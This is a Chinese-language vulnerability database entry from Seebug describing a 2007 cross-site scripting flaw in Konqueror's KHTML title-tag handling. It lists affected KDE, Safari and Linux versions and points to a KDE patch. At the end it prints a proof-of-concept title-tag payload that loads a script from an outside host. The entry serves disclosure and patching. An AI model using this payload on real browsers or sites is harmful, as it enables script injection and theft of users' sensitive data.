Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
seebugRootSSV:1398
HistoryFeb 11, 2007 - 12:00 a.m.

KDE Konqueror KHTML库标题跨站脚本漏洞

2007-02-1100:00:00
Root
www.seebug.org
16
JSON

Konqueror是一款多功能的浏览器,允许浏览本地和网络文件系统和全功能的WWW浏览器。
Konqueror处理WEB站点上的标题标签存在输入验证问题,远程攻击者可以利用漏洞进行跨站脚本攻击,可获得目标用户敏感信息。
构建包含恶意脚本代码的<title>标签,当Konqueror引用的时候可导致恶意脚本代码执行,可使目标用户敏感信息泄露。

Ubuntu Ubuntu Linux 5.10 sparc
Ubuntu Ubuntu Linux 5.10 powerpc
Ubuntu Ubuntu Linux 5.10 i386
Ubuntu Ubuntu Linux 5.10 amd64
Ubuntu Ubuntu Linux 6.10 sparc
Ubuntu Ubuntu Linux 6.10 powerpc
Ubuntu Ubuntu Linux 6.10 i386
Ubuntu Ubuntu Linux 6.10 amd64
Ubuntu Ubuntu Linux 6.06 LTS sparc
Ubuntu Ubuntu Linux 6.06 LTS powerpc
Ubuntu Ubuntu Linux 6.06 LTS i386
Ubuntu Ubuntu Linux 6.06 LTS amd64
MandrakeSoft Linux Mandrake 2007.0 x86_64
MandrakeSoft Linux Mandrake 2007.0
MandrakeSoft Corporate Server 4.0 x86_64
MandrakeSoft Corporate Server 3.0 x86_64
MandrakeSoft Corporate Server 3.0
MandrakeSoft Corporate Server 4.0
KDE Libkhtml 4.2
KDE Konqueror 3.5.2
KDE Konqueror 3.5.1
KDE Konqueror 3.3.2
KDE Konqueror 3.3.1
KDE Konqueror 3.3
KDE Konqueror 3.2.3
KDE Konqueror 3.2.2 -6
KDE Konqueror 3.2.1
KDE Konqueror 3.1.5
KDE Konqueror 3.1.4
KDE Konqueror 3.1.3
KDE Konqueror 3.1.2
KDE Konqueror 3.1.1

  • KDE KDE 3.1.1
    KDE Konqueror 3.1
    KDE Konqueror 3.0.5 b
    KDE Konqueror 3.0.5
    KDE Konqueror 3.0.3
  • KDE KDE 3.0.3
    KDE Konqueror 3.0.2
    KDE Konqueror 3.0.1
  • KDE KDE 3.0.1
    KDE Konqueror 3.0
  • KDE KDE 3.0
    KDE Konqueror 2.2.2
  • Debian Linux 3.0 sparc
  • Debian Linux 3.0 s/390
  • Debian Linux 3.0 ppc
  • Debian Linux 3.0 mipsel
  • Debian Linux 3.0 mips
  • Debian Linux 3.0 m68k
  • Debian Linux 3.0 ia-64
  • Debian Linux 3.0 ia-32
  • Debian Linux 3.0 hppa
  • Debian Linux 3.0 arm
  • Debian Linux 3.0 alpha
  • Debian Linux 3.0
  • RedHat Enterprise Linux WS 2.1 IA64
  • RedHat Enterprise Linux WS 2.1
  • RedHat Enterprise Linux ES 2.1 IA64
  • RedHat Enterprise Linux ES 2.1
  • RedHat Enterprise Linux AS 2.1 IA64
  • RedHat Enterprise Linux AS 2.1
  • RedHat Linux Advanced Work Station 2.1
  • Turbolinux Turbolinux Server 8.0
  • Turbolinux Turbolinux Server 7.0
  • Turbolinux Turbolinux Workstation 8.0
  • Turbolinux Turbolinux Workstation 7.0
    KDE Konqueror 2.2.1
    KDE Konqueror 2.1.2
    KDE Konqueror 2.1.1
    KDE kdelibs 3.5.4
  • Gentoo Linux
    KDE kdelibs 3.5.2
  • Gentoo Linux
    KDE kdelibs 3.4.3
    KDE kdelibs 3.4
  • Gentoo Linux
    KDE kdelibs 3.3.2
  • Gentoo Linux
    KDE kdelibs 3.3.1
  • RedHat Desktop 4.0
  • RedHat Enterprise Linux WS 4
  • RedHat Enterprise Linux ES 4
  • RedHat Enterprise Linux Desktop version 4
  • RedHat Enterprise Linux AS 4
    KDE kdelibs 3.3
    KDE kdelibs 3.2.2
    KDE kdelibs 3.2.1
    KDE kdelibs 3.2
    KDE kdelibs 3.1.5
  • KDE KDE 3.1.5
    KDE kdelibs 3.1.4
  • KDE KDE 3.1.4
    KDE kdelibs 3.1.3
  • KDE KDE 3.1.3
  • MandrakeSoft Linux Mandrake 9.2 amd64
  • MandrakeSoft Linux Mandrake 9.2
    KDE kdelibs 3.1.2
    KDE kdelibs 3.1.1
  • KDE KDE 3.1.1
    KDE kdelibs 3.1
  • KDE KDE 3.1
    KDE kdelibs 3.0
  • KDE KDE 3.1
    KDE kdelibs 2.1.2
    KDE kdelibs 2.1.1
  • KDE KDE 2.1.1
    KDE kdelibs 2.1
  • KDE KDE 2.1
    KDE kdelibs 2.0.1
    KDE kdelibs 2.0
    KDE KDE 3.5.6
    KDE KDE 3.5.5
    KDE KDE 3.5.4
    KDE KDE 3.5.3
    KDE KDE 3.5.2
    KDE KDE 3.5.1
    KDE KDE 3.5
    KDE KDE 3.4.3
    KDE KDE 3.4.2
    KDE KDE 3.4.1
    KDE KDE 3.4
    KDE KDE 3.4
    KDE KDE 3.3.2
    KDE KDE 3.3.2
    KDE KDE 3.3.1
  • RedHat Fedora Core3
    KDE KDE 3.3
    KDE KDE 3.2.3
    KDE KDE 3.2.2
    KDE KDE 3.2.1
    KDE KDE 3.2
    KDE KDE 3.1.5
    KDE KDE 3.1.4
    KDE KDE 3.1.3
    KDE KDE 3.1.2
  • Conectiva Linux 9.0
  • KDE KDE 3.1.2
    KDE KDE 3.1.1 a
    KDE KDE 3.1.1
    KDE KDE 3.1
  • RedHat Linux 9.0 i386
  • S.u.S.E. Linux 8.1
    KDE KDE 3.0.5 b
    KDE KDE 3.0.5 a
  • RedHat Linux 8.0 i386
  • RedHat Linux 7.3 i386
    KDE KDE 3.0.5
  • Conectiva Linux 8.0
    KDE KDE 3.0.4
  • Gentoo Linux 1.4 _rc1
  • Gentoo Linux 1.2
    KDE KDE 3.0.3 a
    KDE KDE 3.0.3
  • Conectiva Linux 8.0
  • Conectiva Linux Enterprise Edition 1.0
  • FreeBSD FreeBSD 4.7 -STABLE
  • MandrakeSoft Linux Mandrake 9.0
    KDE KDE 3.0.2
  • MandrakeSoft Linux Mandrake 8.2
    KDE KDE 3.0.1
    KDE KDE 3.0
  • Conectiva Linux 8.0
    KDE KDE 2.2.2
  • Debian Linux 3.0 sparc
  • Debian Linux 3.0 s/390
  • Debian Linux 3.0 ppc
  • Debian Linux 3.0 mipsel
  • Debian Linux 3.0 mips
  • Debian Linux 3.0 m68k
  • Debian Linux 3.0 ia-64
  • Debian Linux 3.0 ia-32
  • Debian Linux 3.0 hppa
  • Debian Linux 3.0 arm
  • Debian Linux 3.0 alpha
  • Debian Linux 3.0
  • MandrakeSoft Linux Mandrake 8.2 ppc
  • MandrakeSoft Linux Mandrake 8.2
  • MandrakeSoft Linux Mandrake 8.1 ia64
  • MandrakeSoft Linux Mandrake 8.1
  • RedHat Advanced Workstation for the Itanium Processor 2.1
  • RedHat Enterprise Linux WS 2.1 IA64
  • RedHat Enterprise Linux WS 2.1
  • RedHat Enterprise Linux ES 2.1 IA64
  • RedHat Enterprise Linux ES 2.1
  • RedHat Enterprise Linux AS 2.1 IA64
  • RedHat Enterprise Linux AS 2.1
  • RedHat Linux 7.2 ia64
  • RedHat Linux 7.2 i386
  • RedHat Linux 7.1 i386
  • Sun Linux 5.0.7
  • Sun Linux 5.0.6
  • Sun Linux 5.0.5
    KDE KDE 2.2.1
    KDE KDE 2.2
    KDE KDE 2.1.2
    KDE KDE 2.1.1
    KDE KDE 2.1
    KDE KDE 2.0.1
  • Conectiva Linux 6.0
    KDE KDE 2.0 BETA
    KDE KDE 2.0
    KDE KDE 1.2
    KDE KDE 1.1.2
  • Caldera OpenLinux 2.3
  • MandrakeSoft Linux Mandrake 7.0
    KDE KDE 1.1.1
    KDE KDE 1.1
    Apple Safari RSS 2.0 pre-release
    Apple Safari 2.0.4
    Apple Safari 2.0.3
    Apple Safari 2.0.2
    Apple Safari 2.0.1
  • Apple Mac OS X 10.4.2
  • Apple Mac OS X 10.4.1
  • Apple Mac OS X 10.4
  • Apple Mac OS X Server 10.4.2
  • Apple Mac OS X Server 10.4.1
  • Apple Mac OS X Server 10.4
    Apple Safari 2.0
  • Apple Mac OS X 10.4.2
  • Apple Mac OS X 10.4.1
  • Apple Mac OS X 10.4
  • Apple Mac OS X Server 10.4.2
  • Apple Mac OS X Server 10.4.1
  • Apple Mac OS X Server 10.4
    Apple Safari 1.3.1
    Apple Safari 1.3
  • Apple Mac OS X 10.3.9
    Apple Safari 1.2.3
    Apple Safari 1.2.2
    Apple Safari 1.2.1
    Apple Safari 1.2
  • Apple Mac OS X 10.3.7
  • Apple Mac OS X 10.3.7
  • Apple Mac OS X 10.3.6
  • Apple Mac OS X 10.3.6
  • Apple Mac OS X 10.3.5
  • Apple Mac OS X 10.3.5
  • Apple Mac OS X 10.3.4
  • Apple Mac OS X 10.3.4
  • Apple Mac OS X 10.3.3
  • Apple Mac OS X 10.3.3
  • Apple Mac OS X 10.3.2
  • Apple Mac OS X 10.3.2
  • Apple Mac OS X 10.3.1
  • Apple Mac OS X 10.3.1
  • Apple Mac OS X 10.3
  • Apple Mac OS X 10.3
  • Apple Mac OS X 10.2.8
  • Apple Mac OS X 10.2.8
  • Apple Mac OS X 10.2.7
  • Apple Mac OS X 10.2.7
  • Apple Mac OS X 10.2.6
  • Apple Mac OS X 10.2.6
  • Apple Mac OS X 10.2.5
  • Apple Mac OS X 10.2.5
  • Apple Mac OS X 10.2.4
  • Apple Mac OS X 10.2.4
  • Apple Mac OS X 10.2.3
  • Apple Mac OS X 10.2.3
  • Apple Mac OS X 10.2.2
  • Apple Mac OS X 10.2.2
  • Apple Mac OS X 10.2.1
  • Apple Mac OS X 10.2.1
  • Apple Mac OS X 10.2
  • Apple Mac OS X 10.2
  • Apple Mac OS X Server 10.3.7
  • Apple Mac OS X Server 10.3.6
  • Apple Mac OS X Server 10.3.6
  • Apple Mac OS X Server 10.3.5
  • Apple Mac OS X Server 10.3.5
  • Apple Mac OS X Server 10.3.4
  • Apple Mac OS X Server 10.3.4
  • Apple Mac OS X Server 10.3.3
  • Apple Mac OS X Server 10.3.3
  • Apple Mac OS X Server 10.3.2
  • Apple Mac OS X Server 10.3.2
  • Apple Mac OS X Server 10.3.1
  • Apple Mac OS X Server 10.3.1
  • Apple Mac OS X Server 10.3
  • Apple Mac OS X Server 10.3
  • Apple Mac OS X Server 10.2.8
  • Apple Mac OS X Server 10.2.8
  • Apple Mac OS X Server 10.2.7
  • Apple Mac OS X Server 10.2.7
  • Apple Mac OS X Server 10.2.6
  • Apple Mac OS X Server 10.2.6
  • Apple Mac OS X Server 10.2.5
  • Apple Mac OS X Server 10.2.5
  • Apple Mac OS X Server 10.2.4
  • Apple Mac OS X Server 10.2.4
  • Apple Mac OS X Server 10.2.3
  • Apple Mac OS X Server 10.2.3
  • Apple Mac OS X Server 10.2.2
  • Apple Mac OS X Server 10.2.2
  • Apple Mac OS X Server 10.2.1
  • Apple Mac OS X Server 10.2.1
  • Apple Mac OS X Server 10.2
  • Apple Mac OS X Server 10.2
    Apple Safari 1.1
    Apple Safari 1.0
  • Apple Mac OS X 10.2.8
  • Apple Mac OS X 10.2.8
  • Apple Mac OS X 10.2.7
  • Apple Mac OS X 10.2.7
  • Apple Mac OS X 10.2.6
  • Apple Mac OS X 10.2.6
  • Apple Mac OS X 10.2.5
  • Apple Mac OS X 10.2.5
  • Apple Mac OS X 10.2.4
  • Apple Mac OS X 10.2.4
  • Apple Mac OS X 10.2.3
  • Apple Mac OS X 10.2.3
  • Apple Mac OS X 10.2.2
  • Apple Mac OS X 10.2.2
  • Apple Mac OS X 10.2.1
  • Apple Mac OS X 10.2.1
  • Apple Mac OS X 10.2
  • Apple Mac OS X 10.2
  • Apple Mac OS X Server 10.2.8
  • Apple Mac OS X Server 10.2.7
  • Apple Mac OS X Server 10.2.7
  • Apple Mac OS X Server 10.2.6
  • Apple Mac OS X Server 10.2.6
  • Apple Mac OS X Server 10.2.5
  • Apple Mac OS X Server 10.2.5
  • Apple Mac OS X Server 10.2.4
  • Apple Mac OS X Server 10.2.4
  • Apple Mac OS X Server 10.2.3
  • Apple Mac OS X Server 10.2.3
  • Apple Mac OS X Server 10.2.2
  • Apple Mac OS X Server 10.2.2
  • Apple Mac OS X Server 10.2.1
  • Apple Mac OS X Server 10.2.1
  • Apple Mac OS X Server 10.2
  • Apple Mac OS X Server 10.2
    Apple Safari Beta 2

可参考如下补丁:
<a href=“ftp://ftp.kde.org/pub/kde/security_patches” target=“_blank”>ftp://ftp.kde.org/pub/kde/security_patches</a> :
edc2cba17795356e98eba6f3841c6277 post-3.5.6-kdelibs.diff


                                                &lt;title&gt;myblog&lt;!--&lt;/title&gt;&lt;/head&gt;&lt;body&gt;&lt;script
src=http://beanfuzz.com/bean.js&gt;&nbsp;--&gt;&lt;/title&gt;
JSON